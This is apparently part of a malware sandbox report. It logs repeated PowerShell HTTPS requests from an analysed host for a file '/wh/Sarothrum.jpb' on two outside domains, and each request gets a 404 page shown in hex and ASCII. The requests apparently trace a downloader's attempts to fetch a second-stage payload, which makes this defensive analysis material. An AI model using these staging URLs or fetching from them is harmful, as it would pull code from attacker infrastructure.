                                                                    2024-12-05 09:38:29 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549745148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:35 UTC66OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    2024-12-05 09:38:35 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:38:35 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:38:35 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:38:35 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549765184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:41 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:42 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:38:42 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:38:42 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549777148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:47 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:48 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:38:48 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:38:48 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:38:48 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549793184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:53 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:54 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:38:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549808148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:59 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:00 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:38:59 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:00 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:00 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549820184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:05 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:05 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:39:05 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:39:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549837148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:11 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:11 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:39:11 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:11 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:11 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549853184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:17 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:17 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:39:17 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:39:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549864148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:23 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:23 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:39:23 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:23 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:23 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.549880184.171.244.2314432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:28 UTC81OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.almrwad.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:29 UTC164INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:39:29 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-12-05 09:39:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.549896148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:39:34 UTC90OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:39:35 UTC238INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:39:35 GMT
                                                                    server: LiteSpeed
                                                                    2024-12-05 09:39:35 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                    2024-12-05 09:39:35 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


